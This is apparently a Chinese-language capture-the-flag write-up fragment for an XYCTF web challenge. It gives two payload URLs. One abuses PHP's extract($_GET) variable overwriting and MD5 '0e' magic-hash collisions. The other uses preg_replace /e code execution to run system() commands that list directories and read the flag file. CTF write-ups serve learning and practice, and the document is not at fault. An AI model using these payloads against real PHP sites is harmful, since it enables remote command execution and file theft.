查看网页
第一部分的payload:
http://xyctf.top:44891?val1=QNKCDZO&&val2=aabg7XSs&&md5=0e215962017&&XY=QNKCDZO&&XYCTF=QNKCDZO
这里解释一下extract($_GET);,如果我们通过get方式传输已有值的变量,那就会覆盖原有变量
第二部分的payload:
http://xyctf.top:44891/LLeeevvveeelll222.php?a=/test/e&&b=system('cd ../../../;ls;cat flag')&&c=just%20test